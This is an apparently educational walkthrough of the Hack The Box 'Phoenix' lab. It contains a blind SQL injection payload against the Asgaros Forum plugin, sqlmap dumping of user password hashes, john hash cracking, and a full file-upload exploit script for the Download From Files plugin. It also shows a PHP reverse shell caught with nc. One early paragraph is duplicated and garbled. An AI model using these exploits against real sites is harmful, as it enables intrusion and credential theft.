Hack-The-Box-walkthrough[phoenix]

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 05 Mar 2022
IP: 10.10.11.149

  • my htb rank

Enumeration

NMAP

1
2
3
4
5
6
7
┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.149
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have a couple http ports, let’s start with them:

We’re given the domain phoenix.htb so we add it to /etc/hosts. We can register and login to an account:

After singing in, we’re taken to a wordpress panel:

We see pie register however no luck with exploiting it. We can bruteforce directories and find there’s a WAF too:

We also have a site administrator that we find over at /forum:

Looking further into this /forum directory, we find it’s ran by Asgaros Forum, the current install is vulnerable to SQLi:d find cron.sh.xLooking further into this /forum directory, we find it’s ran by Asgaros Forum, the current install is vulnerable to SQLi:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
wpscan --url https://phoenix.htb/ --disable-tls-checks –enumerate u

Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

Sitemap: https://phoenix.htb/wp-sitemap.xml

[+] robots.txt found: https://phoenix.htb/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] WordPress version 5.9 identified (Insecure, released on 2022-01-25).
| Found By: Rss Generator (Passive Detection)
| - https://phoenix.htb/feed/, <generator>https://wordpress.org/?v=5.9</generator>
| - https://phoenix.htb/comments/feed/, <generator>https://wordpress.org/?v=5.9</generator>

[+] WordPress theme in use: coming-soon-event
| Location: https://phoenix.htb/wp-content/themes/coming-soon-event/
| Latest Version: 1.0.8 (up to date)
| Last Updated: 2021-08-24T00:00:00.000Z
| Readme: https://phoenix.htb/wp-content/themes/coming-soon-event/readme.txt
| Style URL: https://phoenix.htb/wp-content/themes/coming-soon-event/style.css?ver=1.0.0
| Style Name: Coming Soon Event
| Description: The Coming Soon Event under construction theme will play a big role in boosting up the business and ...
| Author: blogwp
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.0.8 (80% confidence)
| Found By: Style (Passive Detection)
| - https://phoenix.htb/wp-content/themes/coming-soon-event/style.css?ver=1.0.0, Match: 'Version: 1.0.8'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] accordion-slider-gallery
| Location: https://phoenix.htb/wp-content/plugins/accordion-slider-gallery/
| Latest Version: 2.2
| Last Updated: 2022-02-23T06:48:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.

[+] asgaros-forum
| Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
| Last Updated: 2022-01-30T12:54:00.000Z
| [!] The version is out of date, the latest version is 2.0.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.15.12 (10% confidence)
| Found By: Query Parameter (Passive Detection)
| - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12

[+] photo-gallery-builder
| Location: https://phoenix.htb/wp-content/plugins/photo-gallery-builder/
| Latest Version: 2.3
| Last Updated: 2022-02-23T07:02:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.

[+] pie-register
| Location: https://phoenix.htb/wp-content/plugins/pie-register/
| Latest Version: 3.7.4.2
| Last Updated: 2022-02-14T05:16:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.

[+] timeline-event-history
| Location: https://phoenix.htb/wp-content/plugins/timeline-event-history/
| Latest Version: 2.2
| Last Updated: 2022-02-23T06:58:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
  • Asgaros Forum < 2.0.0 - Subscriber+ Blind SQL Injection

we first need to get the _wpnonce value:

1
https://phoenix.htb/wp-admin/admin-ajax.php?action=rest-nonce

so we can build the payload request like below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /?rest_route=/asgaros-forum/v1/reaction/1/hello HTTP/2
Host: phoenix.htb
Cookie: asgarosforum_unread_cleared=1000-01-01%2000%3A00%3A00; asgarosforum_unread_exclude=a%3A1%3A%7Bi%3A1%3Bi%3A1%3B%7D; wp-settings-time-8=1648102004; PHPSESSID=9fjjtktvasvk7ttiae2lag57bj; wordpress_logged_in_3185d858877bd1933266ec420c541bfc=luci%7C1649311604%7CDS4X13KhVrhypqTbdEQOOGSwBAYP3Sra5ZwFwAC7FCE%7C7e49b65fe7fd8b77bbeb4209856d4ac458907af59e10ff0015ab926f72d210bd; wp-settings-8=mfold%3Df
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://phoenix.htb/forum/forum/first-forum/
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Content-Length: 88


post_id=1 UNION SELECT 1, 1, 1, 1, 1,2,3,4,5,sleep(2) FROM dual -- g&_wpnonce=3354d7889a

confirmed this is a time based sql injection

Foothold

We confirm this works via manual injection. I’ll use SQLMAP to further this:

1
sqlmap --url https://phoenix.htb/forum/?subscribe_topic=1 --level 3 --risk 3 --batch
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Database: wordpress
[40 tables]
+-------------------------------------+
| wp_commentmeta |
| wp_comments |
| wp_forum_ads |
| wp_forum_forums |
| wp_forum_polls |
| wp_forum_polls_options |
| wp_forum_polls_votes |
| wp_forum_posts |
| wp_forum_reactions |
| wp_forum_reports |
| wp_forum_topics |
| wp_links |
| wp_mo2f_network_blocked_ips |
| wp_mo2f_network_email_sent_audit |
| wp_mo2f_network_transactions |
| wp_mo2f_network_whitelisted_ips |
| wp_mo2f_user_details |
| wp_mo2f_user_login_info |
| wp_options |
| wp_pieregister_code |
| wp_pieregister_custom_user_roles |
| wp_pieregister_invite_code_emails |
| wp_pieregister_lockdowns |
| wp_pieregister_redirect_settings |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
| wp_wpns_attack_logs |
| wp_wpns_backup_report |
| wp_wpns_files_scan |
| wp_wpns_ip_rate_details |
| wp_wpns_malware_hash_file |
| wp_wpns_malware_scan_report |
| wp_wpns_malware_scan_report_details |
| wp_wpns_malware_skip_files |
+-------------------------------------+

The immediately useful ones are wp_user that we can dump:

1
2
3
4
5
6
7
8
9
+----+------------+------------------------------------+---------------+------------------------+---------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+------------------------+---------------------+---------------------+-----------------------------------------------+-------------+--------------+
| 1 | Phoenix | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. | phoenix | phoenix@phoenix.htb | https://phoenix.htb | 2021-11-10 15:04:57 | | 0 | Phoenix |
| 3 | john | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. | john | john@domain.htb | | 2021-11-12 13:18:52 | 1637475452:$P$Byf8G.iNgy4e7VvrqKEAA7G/eQ9KtZ. | 0 | john |
| 5 | Jsmith | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. | jsmith | john.smith@phoenix.htb | | 2021-11-21 06:09:43 | | 0 | John Smith |
| 6 | Jane | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 | jane | jane@phoenix.htb | | 2021-11-21 06:10:43 | 1637475043:$P$BMJkE2fGOJndBWkaqjsnK1OYpNn2aA. | 0 | Jane Logan |
| 7 | Jack | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. | jack | jack@phoenix.htb | | 2021-11-21 06:11:27 | 1637475087:$P$B3xIrY8QcD0jSicmD4B/iOltw1jplE/ | 0 | Jack Thomson |
+----+------------+------------------------------------+---------------+------------------------+---------------------+---------------------+-----------------------------------------------+-------------+--------------+

This didn’t get me as far as I’d like. We can crack pheonix’s password to phoenixthefirebird14 using john and rockyou.txt. We can try the file upload exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 512/512 AVX512BW 16x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:08 1.04% (ETA: 11:01:01) 0g/s 21956p/s 109782c/s 109782C/s 840924..211126
phoenixthefirebird14 (?)
superphoenix (?)
password@1234 (?)
3g 0:00:06:25 DONE (2022-03-23 10:54) 0.007786g/s 37224p/s 99497c/s 99497C/s !!!@@@!!!..*7¡Vamos!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
  • Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload

This is pretty easy to use however we run into an SSL cert issue:

We need to change up the request to ignore SSL verification (on both requests):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)

import os.path
from os import path
import json
import requests
import sys

def print_banner():
print("Download From Files <= 1.48 - Arbitrary File Upload")
print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
response = requests.get(uri, verify=False)
raw = response.text

if ("Sikeres" in raw):
return True;
else:
return False;

def main():

print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);

base = sys.argv[1]
file_path = sys.argv[2]

ajax_action = 'download_from_files_617_fileupload'
admin = '/wp-admin/admin-ajax.php';

uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);

if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)

if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)

files = {'files[]' : open(file_path)}
data = {
"allowExt" : "php4,phtml",
"filesName" : "files",
"maxSize" : "1000",
"uploadDir" : "."
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data, verify=False)
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + "wp-admin/" + file_name);
else:
print("Shell Upload Failed")
sys.exit(1)

main()

We can retry using a php reverse shell, Make sure this is saved with a .phtml exploit:

  • php-reverse-shell.php
1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# python3 exploit.py https://phoenix.htb/ ./shell.phtml
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
warnings.warn(
Uploading Shell...
/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
warnings.warn(
Shell Uploaded!
https://phoenix.htb/wp-admin/shell.phtml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.11.149.
Ncat: Connection from 10.10.11.149:34844.
Linux phoenix 5.4.0-96-generic #109-Ubuntu SMP Wed Jan 12 16:49:16 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
06:28:24 up 18:25, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(wp_user) gid=1001(wp_user) groups=1001(wp_user)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
wp_user@phoenix:/$ ^Z
[1]+ Stopped nc -lvp 1234

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# stty raw -echo

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
nc -lvp 1234
reset
reset: unknown terminal type unknown
Terminal type? screen
wp_user@phoenix:/$ id
uid=1001(wp_user) gid=1001(wp_user) groups=1001(wp_user)
wp_user@phoenix:/$ whoami
wp_user

GET OPT KEY

we find there is a 2FA auth in /wp-admin login page, we try to figure it out how to bypass it, or just get the OTP key:

and we found encrypt and decrypt functions from the source of that miniorange plugin at handler/twofa/two_fa_utility.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
wp_user@phoenix:~/wordpress$ cat /opt/wordpress/wp-content/plugins/miniorange-2-factor-authentication/handler/twofa/two_fa_utility.php
<?php
/** miniOrange enables user to log in through mobile authentication as an additional layer of security over password.
* Copyright (C) 2015 miniOrange
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
* @package miniOrange OAuth
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
*/

/**
* This library is miniOrange Authentication Service.
* Contains Request Calls to Customer service.
**/
class MO2f_Utility {

public static function get_hidden_phone( $phone ) {
$hidden_phone = 'xxxxxxx' . substr( $phone, strlen( $phone ) - 3 );
return $hidden_phone;
}

public static function mo2f_check_empty_or_null( $value ) {
if ( ! isset( $value ) || $value == '' ) {
return true;
}
return false;
}

public static function is_curl_installed() {
if ( in_array( 'curl', get_loaded_extensions() ) ) {
return 1;
} else {
return 0;
}
}

public static function get_all_plugins_installed() {
$all_plugins = get_plugins();
$plugins = array();
$form = "";
$plugins["None"] = "None";
foreach ($all_plugins as $plugin_name=>$plugin_details){
$plugins[$plugin_name] = $plugin_details["Name"];
}
unset($plugins['miniorange-2-factor-authentication/miniorange_2_factor_settings.php']);
$form .= '<div style="padding:5px;margin-left:4%;font-size:13px;background-color: #a3e8c2">Please select the plugin<br>
<select name="plugin_selected">';
foreach($plugins as $identifier=>$name) {
$form .= '<option value="' . $identifier . '">' . $name . '</option>' ;
}
$form .= '</select></div>';
return $form;
}

public static function mo2f_check_number_length( $token ) {
if ( is_numeric( $token ) ) {
if ( strlen( $token ) >= 4 && strlen( $token ) <= 8 ) {
return true;
} else {
return false;
}
} else {
return false;
}
}

public static function mo2f_get_hidden_email( $email ) {
if ( ! isset( $email ) || trim( $email ) === '' ) {
return "";
}
$emailsize = strlen( $email );
$partialemail = substr( $email, 0, 1 );
$temp = strrpos( $email, "@" );
$endemail = substr( $email, $temp - 1, $emailsize );
for ( $i = 1; $i < $temp; $i ++ ) {
$partialemail = $partialemail . 'x';
}
$hiddenemail = $partialemail . $endemail;
return $hiddenemail;
}

public static function check_if_email_is_already_registered( $email ) {
global $Mo2fdbQueries;
$users = get_users( array() );
foreach ( $users as $user ) {
$user_email = $Mo2fdbQueries->get_user_detail( 'mo2f_user_email', $user->ID );
if ( $user_email == $email ) {
return true;
}
}

return false;
}

public static function check_if_request_is_from_mobile_device( $useragent ) {
if ( preg_match( '/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i', $useragent ) || preg_match( '/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i', substr( $useragent, 0, 4 ) ) ) {
return true;
} else {
return false;
}
}


public static function set_user_values( $user_session_id, $variable, $value){
global $Mo2fdbQueries;
$key = get_option( 'mo2f_encryption_key' );
$data_option=NULL;

if(empty($data_option)){

//setting session
$_SESSION[$variable] = $value;

// setting cookie values
if(is_array($value)){
if($variable == 'mo_2_factor_kba_questions'){
MO2f_Utility::mo2f_set_cookie_values( 'kba_question1', $value[0]['question']);
MO2f_Utility::mo2f_set_cookie_values( 'kba_question2', $value[1]['question'] );
}else if($variable == 'mo2f_rba_status'){
MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_status', $value["status"] );
MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_sessionUuid', $value["sessionUuid"] );
MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_decision_flag', $value["decision_flag"] );
}
}else{
MO2f_Utility::mo2f_set_cookie_values( $variable, $value);
}

// setting values in database
$user_session_id = MO2f_Utility::decrypt_data( $user_session_id, $key );
if ( is_array( $value ) ) {
$string_value = serialize( $value );
$Mo2fdbQueries->save_user_login_details( $user_session_id, array( $variable => $string_value ) );
} else {
$Mo2fdbQueries->save_user_login_details( $user_session_id, array( $variable => $value ) );
}
} else if (!empty($data_option) && $data_option=="sessions"){

$_SESSION[$variable] = $value;

}else if (!empty($data_option) && $data_option=="cookies"){

if(is_array($value)){
if($variable == 'mo_2_factor_kba_questions'){
MO2f_Utility::mo2f_set_cookie_values( 'kba_question1', $value[0] );
MO2f_Utility::mo2f_set_cookie_values( 'kba_question2', $value[1] );
}else if($variable == 'mo2f_rba_status'){
MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_status', $value["status"] );
MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_sessionUuid', $value["sessionUuid"] );
MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_decision_flag', $value["decision_flag"] );
}
}else{
MO2f_Utility::mo2f_set_cookie_values( $variable, $value);
}
} else if (!empty($data_option) && $data_option=="tables"){
$user_session_id = MO2f_Utility::decrypt_data( $user_session_id, $key );
if ( is_array( $value ) ) {
$string_value = serialize( $value );
$Mo2fdbQueries->save_user_login_details( $user_session_id, array( $variable => $string_value ) );
} else {
$Mo2fdbQueries->save_user_login_details( $user_session_id, array( $variable => $value ) );
}
}
}
public static function get_client_ipaddress(){

$ip = null;
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {

$ip = $_SERVER['HTTP_CLIENT_IP'];

} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {

$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
/*

Returns Random string with length provided in parameter.

*/

/**
* @param string $data - crypt response from Sagepay
*
* @return string
*/
public static function decrypt_data( $data, $key ) {
$c = base64_decode($data);
$ivlen = openssl_cipher_iv_length($cipher="AES-128-CBC");
$iv = substr($c, 0, $ivlen);
$hmac = substr($c, $ivlen, $sha2len=32);
$ciphertext_raw = substr($c, $ivlen+$sha2len);
$original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
$calcmac = hash_hmac('sha256', $ciphertext_raw, $key, $as_binary=true);
$decrypted_text = '';
if(is_string($hmac) and is_string($calcmac))
{
if (hash_equals($hmac, $calcmac))//PHP 5.6+ timing attack safe comparison
{
$decrypted_text=$original_plaintext;
}
}

return $decrypted_text;
}

public static function random_str( $length, $keyspace = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' ) {
$randomString = '';
$charactersLength = strlen( $keyspace );
$keyspace = $keyspace . microtime( true );
$keyspace = str_shuffle( $keyspace );
for ( $i = 0; $i < $length; $i ++ ) {
$randomString .= $keyspace[ rand( 0, $charactersLength - 1 ) ];
}

return $randomString;

}

public static function mo2f_set_transient( $session_id, $key, $value, $expiration = 300 ) {
set_transient($session_id.$key, $value, $expiration);
$transient_array = get_site_option($session_id);
$transient_array[$key] = $value;
update_site_option($session_id, $transient_array);
MO2f_Utility::mo2f_set_session_value($session_id, $transient_array);
if(is_array($value))
$value = json_encode($value) ;

MO2f_Utility::mo2f_set_cookie_values(base64_encode($session_id),$value);

}
public static function mo2f_get_transient( $session_id, $key) {
MO2f_Utility::mo2f_start_session();

if(isset($_SESSION[$session_id])){
$transient_array = $_SESSION[$session_id];
$transient_value = isset($transient_array[$key]) ? $transient_array[$key] : null;
return $transient_value;
}else if(isset($_COOKIE[base64_decode($session_id)])){
$transient_value = MO2f_Utility::mo2f_get_cookie_values(base64_decode($session_id));
return $transient_value;
}else{
$transient_value = get_transient($session_id.$key);
if(!$transient_value){
$transient_array = get_site_option($session_id);
$transient_value = isset($transient_array[$key]) ? $transient_array[$key] : null;
}
return $transient_value;
}


}
public static function mo2f_set_session_value($session_id, $transient_array){
MO2f_Utility::mo2f_start_session();
$_SESSION[ $session_id ] = $transient_array ;
}

public static function mo2f_start_session() {
if ( ! session_id() || session_id() == '' || ! isset( $_SESSION ) ) {
$session_path = ini_get('session.save_path');
if( is_writable($session_path) && is_readable($session_path) && !headers_sent() ) {
if(session_status() != PHP_SESSION_DISABLED )
session_start();
}
}
}
/**
* The function returns the session variables, and if not, retrieves the cookie values set in case the right permissions are not aassigned for the sessions folder in the server.
*
* @param string $variable - the session or cookie variable name
* @param string $session_id - the session id of the user
*
* @return string
*/
public static function mo2f_retrieve_user_temp_values( $variable, $session_id = null ) {
global $Mo2fdbQueries;
$data_option=NULL;
if(empty($data_option)){
if ( isset( $_SESSION[ $variable ] ) && ! empty( $_SESSION[ $variable ] ) ) {
//update_option('mo2f_data_storage',"sessions");
return $_SESSION[ $variable ];
} else {
$key = get_option( 'mo2f_encryption_key' );
$cookie_value = false;
if ( $variable == 'mo2f_rba_status' ) {
if ( isset( $_COOKIE['mo2f_rba_status_status'] ) && ! empty( $_COOKIE['mo2f_rba_status_status'] ) ) {
$mo2f_rba_status_status = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_status' );
